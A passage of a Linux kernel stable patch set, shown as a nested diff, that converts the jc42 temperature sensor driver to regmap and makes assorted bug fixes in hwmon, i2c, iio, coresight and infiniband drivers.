+ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 		      u32 attr, int channel, long val)
+ {
+ 	struct jc42_data *data = dev_get_drvdata(dev);
+-	struct i2c_client *client = data->client;
++	unsigned int regval;
+ 	int diff, hyst;
+ 	int ret;
+ 
+@@ -334,21 +335,23 @@ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 
+ 	switch (attr) {
+ 	case hwmon_temp_min:
+-		data->temp[t_min] = jc42_temp_to_reg(val, data->extended);
+-		ret = i2c_smbus_write_word_swapped(client, temp_regs[t_min],
+-						   data->temp[t_min]);
++		ret = regmap_write(data->regmap, JC42_REG_TEMP_LOWER,
++				   jc42_temp_to_reg(val, data->extended));
+ 		break;
+ 	case hwmon_temp_max:
+-		data->temp[t_max] = jc42_temp_to_reg(val, data->extended);
+-		ret = i2c_smbus_write_word_swapped(client, temp_regs[t_max],
+-						   data->temp[t_max]);
++		ret = regmap_write(data->regmap, JC42_REG_TEMP_UPPER,
++				   jc42_temp_to_reg(val, data->extended));
+ 		break;
+ 	case hwmon_temp_crit:
+-		data->temp[t_crit] = jc42_temp_to_reg(val, data->extended);
+-		ret = i2c_smbus_write_word_swapped(client, temp_regs[t_crit],
+-						   data->temp[t_crit]);
++		ret = regmap_write(data->regmap, JC42_REG_TEMP_CRITICAL,
++				   jc42_temp_to_reg(val, data->extended));
+ 		break;
+ 	case hwmon_temp_crit_hyst:
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_CRITICAL,
++				  &regval);
++		if (ret)
++			break;
++
+ 		/*
+ 		 * JC42.4 compliant chips only support four hysteresis values.
+ 		 * Pick best choice and go from there.
+@@ -356,7 +359,7 @@ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 		val = clamp_val(val, (data->extended ? JC42_TEMP_MIN_EXTENDED
+ 						     : JC42_TEMP_MIN) - 6000,
+ 				JC42_TEMP_MAX);
+-		diff = jc42_temp_from_reg(data->temp[t_crit]) - val;
++		diff = jc42_temp_from_reg(regval) - val;
+ 		hyst = 0;
+ 		if (diff > 0) {
+ 			if (diff < 2250)
+@@ -368,9 +371,8 @@ static int jc42_write(struct device *dev, enum hwmon_sensor_types type,
+ 		}
+ 		data->config = (data->config & ~JC42_CFG_HYST_MASK) |
+ 				(hyst << JC42_CFG_HYST_SHIFT);
+-		ret = i2c_smbus_write_word_swapped(data->client,
+-						   JC42_REG_CONFIG,
+-						   data->config);
++		ret = regmap_write(data->regmap, JC42_REG_CONFIG,
++				   data->config);
+ 		break;
+ 	default:
+ 		ret = -EOPNOTSUPP;
+@@ -470,51 +472,80 @@ static const struct hwmon_chip_info jc42_chip_info = {
+ 	.info = jc42_info,
+ };
+ 
++static bool jc42_readable_reg(struct device *dev, unsigned int reg)
++{
++	return (reg >= JC42_REG_CAP && reg <= JC42_REG_DEVICEID) ||
++		reg == JC42_REG_SMBUS;
++}
++
++static bool jc42_writable_reg(struct device *dev, unsigned int reg)
++{
++	return (reg >= JC42_REG_CONFIG && reg <= JC42_REG_TEMP_CRITICAL) ||
++		reg == JC42_REG_SMBUS;
++}
++
++static bool jc42_volatile_reg(struct device *dev, unsigned int reg)
++{
++	return reg == JC42_REG_CONFIG || reg == JC42_REG_TEMP;
++}
++
++static const struct regmap_config jc42_regmap_config = {
++	.reg_bits = 8,
++	.val_bits = 16,
++	.val_format_endian = REGMAP_ENDIAN_BIG,
++	.max_register = JC42_REG_SMBUS,
++	.writeable_reg = jc42_writable_reg,
++	.readable_reg = jc42_readable_reg,
++	.volatile_reg = jc42_volatile_reg,
++	.cache_type = REGCACHE_RBTREE,
++};
++
+ static int jc42_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+ 	struct device *hwmon_dev;
++	unsigned int config, cap;
+ 	struct jc42_data *data;
+-	int config, cap;
++	int ret;
+ 
+ 	data = devm_kzalloc(dev, sizeof(struct jc42_data), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+-	data->client = client;
++	data->regmap = devm_regmap_init_i2c(client, &jc42_regmap_config);
++	if (IS_ERR(data->regmap))
++		return PTR_ERR(data->regmap);
++
+ 	i2c_set_clientdata(client, data);
+ 	mutex_init(&data->update_lock);
+ 
+-	cap = i2c_smbus_read_word_swapped(client, JC42_REG_CAP);
+-	if (cap < 0)
+-		return cap;
++	ret = regmap_read(data->regmap, JC42_REG_CAP, &cap);
++	if (ret)
++		return ret;
+ 
+ 	data->extended = !!(cap & JC42_CAP_RANGE);
+ 
+ 	if (device_property_read_bool(dev, "smbus-timeout-disable")) {
+-		int smbus;
+-
+ 		/*
+ 		 * Not all chips support this register, but from a
+ 		 * quick read of various datasheets no chip appears
+ 		 * incompatible with the below attempt to disable
+ 		 * the timeout. And the whole thing is opt-in...
+ 		 */
+-		smbus = i2c_smbus_read_word_swapped(client, JC42_REG_SMBUS);
+-		if (smbus < 0)
+-			return smbus;
+-		i2c_smbus_write_word_swapped(client, JC42_REG_SMBUS,
+-					     smbus | SMBUS_STMOUT);
++		ret = regmap_set_bits(data->regmap, JC42_REG_SMBUS,
++				      SMBUS_STMOUT);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	config = i2c_smbus_read_word_swapped(client, JC42_REG_CONFIG);
+-	if (config < 0)
+-		return config;
++	ret = regmap_read(data->regmap, JC42_REG_CONFIG, &config);
++	if (ret)
++		return ret;
+ 
+ 	data->orig_config = config;
+ 	if (config & JC42_CFG_SHUTDOWN) {
+ 		config &= ~JC42_CFG_SHUTDOWN;
+-		i2c_smbus_write_word_swapped(client, JC42_REG_CONFIG, config);
++		regmap_write(data->regmap, JC42_REG_CONFIG, config);
+ 	}
+ 	data->config = config;
+ 
+@@ -535,7 +566,7 @@ static void jc42_remove(struct i2c_client *client)
+ 
+ 		config = (data->orig_config & ~JC42_CFG_HYST_MASK)
+ 		  | (data->config & JC42_CFG_HYST_MASK);
+-		i2c_smbus_write_word_swapped(client, JC42_REG_CONFIG, config);
++		regmap_write(data->regmap, JC42_REG_CONFIG, config);
+ 	}
+ }
+ 
+@@ -546,8 +577,11 @@ static int jc42_suspend(struct device *dev)
+ 	struct jc42_data *data = dev_get_drvdata(dev);
+ 
+ 	data->config |= JC42_CFG_SHUTDOWN;
+-	i2c_smbus_write_word_swapped(data->client, JC42_REG_CONFIG,
+-				     data->config);
++	regmap_write(data->regmap, JC42_REG_CONFIG, data->config);
++
++	regcache_cache_only(data->regmap, true);
++	regcache_mark_dirty(data->regmap);
++
+ 	return 0;
+ }
+ 
+@@ -555,10 +589,13 @@ static int jc42_resume(struct device *dev)
+ {
+ 	struct jc42_data *data = dev_get_drvdata(dev);
+ 
++	regcache_cache_only(data->regmap, false);
++
+ 	data->config &= ~JC42_CFG_SHUTDOWN;
+-	i2c_smbus_write_word_swapped(data->client, JC42_REG_CONFIG,
+-				     data->config);
+-	return 0;
++	regmap_write(data->regmap, JC42_REG_CONFIG, data->config);
++
++	/* Restore cached register values to hardware */
++	return regcache_sync(data->regmap);
+ }
+ 
+ static const struct dev_pm_ops jc42_dev_pm_ops = {
+diff --git a/drivers/hwmon/nct6775-platform.c b/drivers/hwmon/nct6775-platform.c
+index b347837842139..bf43f73dc835f 100644
+--- a/drivers/hwmon/nct6775-platform.c
++++ b/drivers/hwmon/nct6775-platform.c
+@@ -1043,7 +1043,9 @@ static struct platform_device *pdev[2];
+ 
+ static const char * const asus_wmi_boards[] = {
+ 	"PRO H410T",
++	"ProArt B550-CREATOR",
+ 	"ProArt X570-CREATOR WIFI",
++	"ProArt Z490-CREATOR 10G",
+ 	"Pro B550M-C",
+ 	"Pro WS X570-ACE",
+ 	"PRIME B360-PLUS",
+@@ -1055,8 +1057,10 @@ static const char * const asus_wmi_boards[] = {
+ 	"PRIME X570-P",
+ 	"PRIME X570-PRO",
+ 	"ROG CROSSHAIR VIII DARK HERO",
++	"ROG CROSSHAIR VIII EXTREME",
+ 	"ROG CROSSHAIR VIII FORMULA",
+ 	"ROG CROSSHAIR VIII HERO",
++	"ROG CROSSHAIR VIII HERO (WI-FI)",
+ 	"ROG CROSSHAIR VIII IMPACT",
+ 	"ROG STRIX B550-A GAMING",
+ 	"ROG STRIX B550-E GAMING",
+@@ -1080,8 +1084,11 @@ static const char * const asus_wmi_boards[] = {
+ 	"ROG STRIX Z490-G GAMING (WI-FI)",
+ 	"ROG STRIX Z490-H GAMING",
+ 	"ROG STRIX Z490-I GAMING",
++	"TUF GAMING B550M-E",
++	"TUF GAMING B550M-E (WI-FI)",
+ 	"TUF GAMING B550M-PLUS",
+ 	"TUF GAMING B550M-PLUS (WI-FI)",
++	"TUF GAMING B550M-PLUS WIFI II",
+ 	"TUF GAMING B550-PLUS",
+ 	"TUF GAMING B550-PLUS WIFI II",
+ 	"TUF GAMING B550-PRO",
+diff --git a/drivers/hwtracing/coresight/coresight-cti-core.c b/drivers/hwtracing/coresight/coresight-cti-core.c
+index c6e8c6542f24b..d2cf4f4848e1b 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-core.c
++++ b/drivers/hwtracing/coresight/coresight-cti-core.c
+@@ -564,7 +564,7 @@ static void cti_add_assoc_to_csdev(struct coresight_device *csdev)
+ 			 * if we found a matching csdev then update the ECT
+ 			 * association pointer for the device with this CTI.
+ 			 */
+-			coresight_set_assoc_ectdev_mutex(csdev->ect_dev,
++			coresight_set_assoc_ectdev_mutex(csdev,
+ 							 ect_item->csdev);
+ 			break;
+ 		}
+diff --git a/drivers/hwtracing/coresight/coresight-trbe.c b/drivers/hwtracing/coresight/coresight-trbe.c
+index 2b386bb848f8d..1fc4fd79a1c69 100644
+--- a/drivers/hwtracing/coresight/coresight-trbe.c
++++ b/drivers/hwtracing/coresight/coresight-trbe.c
+@@ -1434,6 +1434,7 @@ static int arm_trbe_probe_cpuhp(struct trbe_drvdata *drvdata)
+ 
+ static void arm_trbe_remove_cpuhp(struct trbe_drvdata *drvdata)
+ {
++	cpuhp_state_remove_instance(drvdata->trbe_online, &drvdata->hotplug_node);
+ 	cpuhp_remove_multi_state(drvdata->trbe_online);
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-ismt.c b/drivers/i2c/busses/i2c-ismt.c
+index fe2349590f75e..c74985d77b0ec 100644
+--- a/drivers/i2c/busses/i2c-ismt.c
++++ b/drivers/i2c/busses/i2c-ismt.c
+@@ -509,6 +509,9 @@ static int ismt_access(struct i2c_adapter *adap, u16 addr,
+ 		if (read_write == I2C_SMBUS_WRITE) {
+ 			/* Block Write */
+ 			dev_dbg(dev, "I2C_SMBUS_BLOCK_DATA:  WRITE\n");
++			if (data->block[0] < 1 || data->block[0] > I2C_SMBUS_BLOCK_MAX)
++				return -EINVAL;
++
+ 			dma_size = data->block[0] + 1;
+ 			dma_direction = DMA_TO_DEVICE;
+ 			desc->wr_len_cmd = dma_size;
+diff --git a/drivers/i2c/busses/i2c-pxa-pci.c b/drivers/i2c/busses/i2c-pxa-pci.c
+index f614cade432bb..30e38bc8b6db8 100644
+--- a/drivers/i2c/busses/i2c-pxa-pci.c
++++ b/drivers/i2c/busses/i2c-pxa-pci.c
+@@ -105,7 +105,7 @@ static int ce4100_i2c_probe(struct pci_dev *dev,
+ 	int i;
+ 	struct ce4100_devices *sds;
+ 
+-	ret = pci_enable_device_mem(dev);
++	ret = pcim_enable_device(dev);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -114,10 +114,8 @@ static int ce4100_i2c_probe(struct pci_dev *dev,
+ 		return -EINVAL;
+ 	}
+ 	sds = kzalloc(sizeof(*sds), GFP_KERNEL);
+-	if (!sds) {
+-		ret = -ENOMEM;
+-		goto err_mem;
+-	}
++	if (!sds)
++		return -ENOMEM;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(sds->pdev); i++) {
+ 		sds->pdev[i] = add_i2c_device(dev, i);
+@@ -133,8 +131,6 @@ static int ce4100_i2c_probe(struct pci_dev *dev,
+ 
+ err_dev_add:
+ 	kfree(sds);
+-err_mem:
+-	pci_disable_device(dev);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/i2c/muxes/i2c-mux-reg.c b/drivers/i2c/muxes/i2c-mux-reg.c
+index 0e0679f65cf77..30a6de1694e07 100644
+--- a/drivers/i2c/muxes/i2c-mux-reg.c
++++ b/drivers/i2c/muxes/i2c-mux-reg.c
+@@ -183,13 +183,12 @@ static int i2c_mux_reg_probe(struct platform_device *pdev)
+ 	if (!mux->data.reg) {
+ 		dev_info(&pdev->dev,
+ 			"Register not set, using platform resource\n");
+-		res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-		mux->data.reg_size = resource_size(res);
+-		mux->data.reg = devm_ioremap_resource(&pdev->dev, res);
++		mux->data.reg = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 		if (IS_ERR(mux->data.reg)) {
+ 			ret = PTR_ERR(mux->data.reg);
+ 			goto err_put_parent;
+ 		}
++		mux->data.reg_size = resource_size(res);
+ 	}
+ 
+ 	if (mux->data.reg_size != 4 && mux->data.reg_size != 2 &&
+diff --git a/drivers/iio/adc/ad_sigma_delta.c b/drivers/iio/adc/ad_sigma_delta.c
+index 261a9a6b45e15..d8570f620785a 100644
+--- a/drivers/iio/adc/ad_sigma_delta.c
++++ b/drivers/iio/adc/ad_sigma_delta.c
+@@ -281,10 +281,10 @@ int ad_sigma_delta_single_conversion(struct iio_dev *indio_dev,
+ 	unsigned int data_reg;
+ 	int ret = 0;
+ 
+-	if (iio_buffer_enabled(indio_dev))
+-		return -EBUSY;
++	ret = iio_device_claim_direct_mode(indio_dev);
++	if (ret)
++		return ret;
+ 
+-	mutex_lock(&indio_dev->mlock);
+ 	ad_sigma_delta_set_channel(sigma_delta, chan->address);
+ 
+ 	spi_bus_lock(sigma_delta->spi->master);
+@@ -323,7 +323,7 @@ out:
+ 	ad_sigma_delta_set_mode(sigma_delta, AD_SD_MODE_IDLE);
+ 	sigma_delta->bus_locked = false;
+ 	spi_bus_unlock(sigma_delta->spi->master);
+-	mutex_unlock(&indio_dev->mlock);
++	iio_device_release_direct_mode(indio_dev);
+ 
+ 	if (ret)
+ 		return ret;
+diff --git a/drivers/iio/adc/ti-adc128s052.c b/drivers/iio/adc/ti-adc128s052.c
+index 622fd384983c7..b3d5b9b7255bc 100644
+--- a/drivers/iio/adc/ti-adc128s052.c
++++ b/drivers/iio/adc/ti-adc128s052.c
+@@ -181,13 +181,13 @@ static int adc128_probe(struct spi_device *spi)
+ }
+ 
+ static const struct of_device_id adc128_of_match[] = {
+-	{ .compatible = "ti,adc128s052", },
+-	{ .compatible = "ti,adc122s021", },
+-	{ .compatible = "ti,adc122s051", },
+-	{ .compatible = "ti,adc122s101", },
+-	{ .compatible = "ti,adc124s021", },
+-	{ .compatible = "ti,adc124s051", },
+-	{ .compatible = "ti,adc124s101", },
++	{ .compatible = "ti,adc128s052", .data = (void*)0L, },
++	{ .compatible = "ti,adc122s021", .data = (void*)1L, },
++	{ .compatible = "ti,adc122s051", .data = (void*)1L, },
++	{ .compatible = "ti,adc122s101", .data = (void*)1L, },
++	{ .compatible = "ti,adc124s021", .data = (void*)2L, },
++	{ .compatible = "ti,adc124s051", .data = (void*)2L, },
++	{ .compatible = "ti,adc124s101", .data = (void*)2L, },
+ 	{ /* sentinel */ },
+ };
+ MODULE_DEVICE_TABLE(of, adc128_of_match);
+diff --git a/drivers/iio/addac/ad74413r.c b/drivers/iio/addac/ad74413r.c
+index 899bcd83f40bc..e0e130ba9d3ec 100644
+--- a/drivers/iio/addac/ad74413r.c
++++ b/drivers/iio/addac/ad74413r.c
+@@ -691,7 +691,7 @@ static int ad74413_get_input_current_offset(struct ad74413r_state *st,
+ 	if (ret)
+ 		return ret;
+ 
+-	*val = voltage_offset * AD74413R_ADC_RESULT_MAX / voltage_range;
++	*val = voltage_offset * (int)AD74413R_ADC_RESULT_MAX / voltage_range;
+ 
+ 	return IIO_VAL_INT;
+ }
+diff --git a/drivers/iio/imu/adis.c b/drivers/iio/imu/adis.c
+index f7fcfd04f659d..bc40240b29e26 100644
+--- a/drivers/iio/imu/adis.c
++++ b/drivers/iio/imu/adis.c
+@@ -270,23 +270,19 @@ EXPORT_SYMBOL_NS(adis_debugfs_reg_access, IIO_ADISLIB);
+ #endif
+ 
+ /**
+- * adis_enable_irq() - Enable or disable data ready IRQ
++ * __adis_enable_irq() - Enable or disable data ready IRQ (unlocked)
+  * @adis: The adis device
+  * @enable: Whether to enable the IRQ
+  *
+  * Returns 0 on success, negative error code otherwise
+  */
+-int adis_enable_irq(struct adis *adis, bool enable)
++int __adis_enable_irq(struct adis *adis, bool enable)
+ {
+-	int ret = 0;
++	int ret;
+ 	u16 msc;
+ 
+-	mutex_lock(&adis->state_lock);
+-
+-	if (adis->data->enable_irq) {
+-		ret = adis->data->enable_irq(adis, enable);
+-		goto out_unlock;
+-	}
++	if (adis->data->enable_irq)
++		return adis->data->enable_irq(adis, enable);
+ 
+ 	if (adis->data->unmasked_drdy) {
+ 		if (enable)
+@@ -294,12 +290,12 @@ int adis_enable_irq(struct adis *adis, bool enable)
+ 		else
+ 			disable_irq(adis->spi->irq);
+ 
+-		goto out_unlock;
++		return 0;
+ 	}
+ 
+ 	ret = __adis_read_reg_16(adis, adis->data->msc_ctrl_reg, &msc);
+ 	if (ret)
+-		goto out_unlock;
++		return ret;
+ 
+ 	msc |= ADIS_MSC_CTRL_DATA_RDY_POL_HIGH;
+ 	msc &= ~ADIS_MSC_CTRL_DATA_RDY_DIO2;
+@@ -308,13 +304,9 @@ int adis_enable_irq(struct adis *adis, bool enable)
+ 	else
+ 		msc &= ~ADIS_MSC_CTRL_DATA_RDY_EN;
+ 
+-	ret = __adis_write_reg_16(adis, adis->data->msc_ctrl_reg, msc);
+-
+-out_unlock:
+-	mutex_unlock(&adis->state_lock);
+-	return ret;
++	return __adis_write_reg_16(adis, adis->data->msc_ctrl_reg, msc);
+ }
+-EXPORT_SYMBOL_NS(adis_enable_irq, IIO_ADISLIB);
++EXPORT_SYMBOL_NS(__adis_enable_irq, IIO_ADISLIB);
+ 
+ /**
+  * __adis_check_status() - Check the device for error conditions (unlocked)
+@@ -445,7 +437,7 @@ int __adis_initial_startup(struct adis *adis)
+ 	 * with 'IRQF_NO_AUTOEN' anyways.
+ 	 */
+ 	if (!adis->data->unmasked_drdy)
+-		adis_enable_irq(adis, false);
++		__adis_enable_irq(adis, false);
+ 
+ 	if (!adis->data->prod_id_reg)
+ 		return 0;
+diff --git a/drivers/iio/industrialio-event.c b/drivers/iio/industrialio-event.c
+index 3d78da2531a9a..727e2ef66aa4b 100644
+--- a/drivers/iio/industrialio-event.c
++++ b/drivers/iio/industrialio-event.c
+@@ -556,7 +556,7 @@ int iio_device_register_eventset(struct iio_dev *indio_dev)
+ 
+ 	ret = iio_device_register_sysfs_group(indio_dev, &ev_int->group);
+ 	if (ret)
+-		goto error_free_setup_event_lines;
++		goto error_free_group_attrs;
+ 
+ 	ev_int->ioctl_handler.ioctl = iio_event_ioctl;
+ 	iio_device_ioctl_handler_register(&iio_dev_opaque->indio_dev,
+@@ -564,6 +564,8 @@ int iio_device_register_eventset(struct iio_dev *indio_dev)
+ 
+ 	return 0;
+ 
++error_free_group_attrs:
++	kfree(ev_int->group.attrs);
+ error_free_setup_event_lines:
+ 	iio_free_chan_devattr_list(&ev_int->dev_attr_list);
+ 	kfree(ev_int);
+diff --git a/drivers/iio/temperature/ltc2983.c b/drivers/iio/temperature/ltc2983.c
+index a60ccf1836872..1117991ca2ab6 100644
+--- a/drivers/iio/temperature/ltc2983.c
++++ b/drivers/iio/temperature/ltc2983.c
+@@ -209,6 +209,7 @@ struct ltc2983_data {
+ 	 * Holds the converted temperature
+ 	 */
+ 	__be32 temp __aligned(IIO_DMA_MINALIGN);
++	__be32 chan_val;
+ };
+ 
+ struct ltc2983_sensor {
+@@ -313,19 +314,18 @@ static int __ltc2983_fault_handler(const struct ltc2983_data *st,
+ 	return 0;
+ }
+ 
+-static int __ltc2983_chan_assign_common(const struct ltc2983_data *st,
++static int __ltc2983_chan_assign_common(struct ltc2983_data *st,
+ 					const struct ltc2983_sensor *sensor,
+ 					u32 chan_val)
+ {
+ 	u32 reg = LTC2983_CHAN_START_ADDR(sensor->chan);
+-	__be32 __chan_val;
+ 
+ 	chan_val |= LTC2983_CHAN_TYPE(sensor->type);
+ 	dev_dbg(&st->spi->dev, "Assign reg:0x%04X, val:0x%08X\n", reg,
+ 		chan_val);
+-	__chan_val = cpu_to_be32(chan_val);
+-	return regmap_bulk_write(st->regmap, reg, &__chan_val,
+-				 sizeof(__chan_val));
++	st->chan_val = cpu_to_be32(chan_val);
++	return regmap_bulk_write(st->regmap, reg, &st->chan_val,
++				 sizeof(st->chan_val));
+ }
+ 
+ static int __ltc2983_chan_custom_sensor_assign(struct ltc2983_data *st,
+diff --git a/drivers/infiniband/Kconfig b/drivers/infiniband/Kconfig
+index aa36ac618e729..17a2274152771 100644
+--- a/drivers/infiniband/Kconfig
++++ b/drivers/infiniband/Kconfig
+@@ -78,6 +78,7 @@ config INFINIBAND_VIRT_DMA
+ 	def_bool !HIGHMEM
+ 
+ if INFINIBAND_USER_ACCESS || !INFINIBAND_USER_ACCESS
++if !UML
+ source "drivers/infiniband/hw/bnxt_re/Kconfig"
+ source "drivers/infiniband/hw/cxgb4/Kconfig"
+ source "drivers/infiniband/hw/efa/Kconfig"
+@@ -94,6 +95,7 @@ source "drivers/infiniband/hw/qib/Kconfig"
+ source "drivers/infiniband/hw/usnic/Kconfig"
+ source "drivers/infiniband/hw/vmw_pvrdma/Kconfig"
+ source "drivers/infiniband/sw/rdmavt/Kconfig"
++endif # !UML
+ source "drivers/infiniband/sw/rxe/Kconfig"
+ source "drivers/infiniband/sw/siw/Kconfig"
+ endif
+diff --git a/drivers/infiniband/core/device.c b/drivers/infiniband/core/device.c
+index b69e2c4e4d2a4..3c422698a51c1 100644
+--- a/drivers/infiniband/core/device.c
++++ b/drivers/infiniband/core/device.c
+@@ -2851,8 +2851,8 @@ err:
+ static void __exit ib_core_cleanup(void)
+ {
+ 	roce_gid_mgmt_cleanup();
+-	nldev_exit();
+ 	rdma_nl_unregister(RDMA_NL_LS);
++	nldev_exit();
+ 	unregister_pernet_device(&rdma_dev_net_ops);
+ 	unregister_blocking_lsm_notifier(&ibdev_lsm_nb);
+ 	ib_sa_cleanup();
+diff --git a/drivers/infiniband/core/mad.c b/drivers/infiniband/core/mad.c
+index 1893aa613ad73..674344eb8e2f4 100644
+--- a/drivers/infiniband/core/mad.c
++++ b/drivers/infiniband/core/mad.c
+@@ -59,9 +59,6 @@ static void create_mad_addr_info(struct ib_mad_send_wr_private *mad_send_wr,
+ 			  struct ib_mad_qp_info *qp_info,
+ 			  struct trace_event_raw_ib_mad_send_template *entry)
+ {
+-	u16 pkey;
+-	struct ib_device *dev = qp_info->port_priv->device;
+-	u32 pnum = qp_info->port_priv->port_num;
+ 	struct ib_ud_wr *wr = &mad_send_wr->send_wr;
+ 	struct rdma_ah_attr attr = {};
+ 
+@@ -69,8 +66,6 @@ static void create_mad_addr_info(struct ib_mad_send_wr_private *mad_send_wr,
+ 
+ 	/* These are common */
+ 	entry->sl = attr.sl;
+-	ib_query_pkey(dev, pnum, wr->pkey_index, &pkey);
+-	entry->pkey = pkey;
+ 	entry->rqpn = wr->remote_qpn;
+ 	entry->rqkey = wr->remote_qkey;
+ 	entry->dlid = rdma_ah_get_dlid(&attr);
+diff --git a/drivers/infiniband/core/nldev.c b/drivers/infiniband/core/nldev.c
+index 12dc97067ed2b..222733a83ddb7 100644
+--- a/drivers/infiniband/core/nldev.c
++++ b/drivers/infiniband/core/nldev.c
+@@ -513,7 +513,7 @@ static int fill_res_qp_entry(struct sk_buff *msg, bool has_cap_net_admin,
+ 
+ 	/* In create_qp() port is not set yet */
+ 	if (qp->port && nla_put_u32(msg, RDMA_NLDEV_ATTR_PORT_INDEX, qp->port))
+-		return -EINVAL;
++		return -EMSGSIZE;
+ 
+ 	ret = nla_put_u32(msg, RDMA_NLDEV_ATTR_RES_LQPN, qp->qp_num);
+ 	if (ret)
+@@ -552,7 +552,7 @@ static int fill_res_cm_id_entry(struct sk_buff *msg, bool has_cap_net_admin,
+ 	struct rdma_cm_id *cm_id = &id_priv->id;
+ 
+ 	if (port && port != cm_id->port_num)
+-		return 0;
++		return -EAGAIN;
+ 
+ 	if (cm_id->port_num &&
+ 	    nla_put_u32(msg, RDMA_NLDEV_ATTR_PORT_INDEX, cm_id->port_num))
+@@ -894,6 +894,8 @@ static int fill_stat_counter_qps(struct sk_buff *msg,
+ 	int ret = 0;
+ 
+ 	table_attr = nla_nest_start(msg, RDMA_NLDEV_ATTR_RES_QP);
++	if (!table_attr)
++		return -EMSGSIZE;
+ 
+ 	rt = &counter->device->res[RDMA_RESTRACK_QP];
+ 	xa_lock(&rt->xa);
+diff --git a/drivers/infiniband/core/restrack.c b/drivers/infiniband/core/restrack.c
+index 1f935d9f61785..01a499a8b88db 100644
+--- a/drivers/infiniband/core/restrack.c
++++ b/drivers/infiniband/core/restrack.c
+@@ -343,8 +343,6 @@ void rdma_restrack_del(struct rdma_restrack_entry *res)
+ 	rt = &dev->res[res->type];
+ 
+ 	old = xa_erase(&rt->xa, res->id);
+-	if (res->type == RDMA_RESTRACK_MR)
+-		return;
+ 	WARN_ON(old != res);
+ 
+ out:
+diff --git a/drivers/infiniband/core/sysfs.c b/drivers/infiniband/core/sysfs.c
+index 84c53bd2a52db..ee59d73915689 100644
+--- a/drivers/infiniband/core/sysfs.c
++++ b/drivers/infiniband/core/sysfs.c
+@@ -1213,6 +1213,9 @@ static struct ib_port *setup_port(struct ib_core_device *coredev, int port_num,
+ 	p->port_num = port_num;
+ 	kobject_init(&p->kobj, &port_type);
+ 
++	if (device->port_data && is_full_dev)
++		device->port_data[port_num].sysfs = p;
++
+ 	cur_group = p->groups_list;
+ 	ret = alloc_port_table_group("gids", &p->groups[0], p->attrs_list,
+ 				     attr->gid_tbl_len, show_port_gid);
+@@ -1258,9 +1261,6 @@ static struct ib_port *setup_port(struct ib_core_device *coredev, int port_num,
+ 	}
+ 
+ 	list_add_tail(&p->kobj.entry, &coredev->port_list);
+-	if (device->port_data && is_full_dev)
+-		device->port_data[port_num].sysfs = p;
+-
+ 	return p;
+ 
+ err_groups:
+@@ -1268,6 +1268,8 @@ err_groups:
+ err_del:
+ 	kobject_del(&p->kobj);
+ err_put:
++	if (device->port_data && is_full_dev)
++		device->port_data[port_num].sysfs = NULL;
+ 	kobject_put(&p->kobj);
+ 	return ERR_PTR(ret);
+ }
+@@ -1276,14 +1278,17 @@ static void destroy_port(struct ib_core_device *coredev, struct ib_port *port)
+ {
+ 	bool is_full_dev = &port->ibdev->coredev == coredev;
+ 
+-	if (port->ibdev->port_data &&
+-	    port->ibdev->port_data[port->port_num].sysfs == port)
+-		port->ibdev->port_data[port->port_num].sysfs = NULL;
+ 	list_del(&port->kobj.entry);
+ 	if (is_full_dev)
+ 		sysfs_remove_groups(&port->kobj, port->ibdev->ops.port_groups);
++
+ 	sysfs_remove_groups(&port->kobj, port->groups_list);
+ 	kobject_del(&port->kobj);
++
++	if (port->ibdev->port_data &&
++	    port->ibdev->port_data[port->port_num].sysfs == port)
++		port->ibdev->port_data[port->port_num].sysfs = NULL;
++
+ 	kobject_put(&port->kobj);
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/affinity.c b/drivers/infiniband/hw/hfi1/affinity.c
+index 877f8e84a672a..77ee77d4000fb 100644
+--- a/drivers/infiniband/hw/hfi1/affinity.c
++++ b/drivers/infiniband/hw/hfi1/affinity.c
+@@ -177,6 +177,8 @@ out:
+ 	for (node = 0; node < node_affinity.num_possible_nodes; node++)
+ 		hfi1_per_node_cntr[node] = 1;
+ 
++	pci_dev_put(dev);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/firmware.c b/drivers/infiniband/hw/hfi1/firmware.c
+index 1d77514ebbee0..0c0cef5b1e0e5 100644
+--- a/drivers/infiniband/hw/hfi1/firmware.c
++++ b/drivers/infiniband/hw/hfi1/firmware.c
+@@ -1743,6 +1743,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 
+ 	if (!dd->platform_config.data) {
+ 		dd_dev_err(dd, "%s: Missing config file\n", __func__);
++		ret = -EINVAL;
+ 		goto bail;
+ 	}
+ 	ptr = (u32 *)dd->platform_config.data;
+@@ -1751,6 +1752,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 	ptr++;
+ 	if (magic_num != PLATFORM_CONFIG_MAGIC_NUM) {
+ 		dd_dev_err(dd, "%s: Bad config file\n", __func__);
++		ret = -EINVAL;
+ 		goto bail;
+ 	}
+ 
+@@ -1774,6 +1776,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 	if (file_length > dd->platform_config.size) {
+ 		dd_dev_info(dd, "%s:File claims to be larger than read size\n",
+ 			    __func__);
++		ret = -EINVAL;
+ 		goto bail;
+ 	} else if (file_length < dd->platform_config.size) {
+ 		dd_dev_info(dd,
+@@ -1794,6 +1797,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 			dd_dev_err(dd, "%s: Failed validation at offset %ld\n",
+ 				   __func__, (ptr - (u32 *)
+ 					      dd->platform_config.data));
++			ret = -EINVAL;
+ 			goto bail;
+ 		}
+ 
+@@ -1837,6 +1841,7 @@ int parse_platform_config(struct hfi1_devdata *dd)
+ 					   __func__, table_type,
+ 					   (ptr - (u32 *)
+ 					    dd->platform_config.data));
++				ret = -EINVAL;
+ 				goto bail; /* We don't trust this file now */
+ 			}
+ 			pcfgcache->config_tables[table_type].table = ptr;
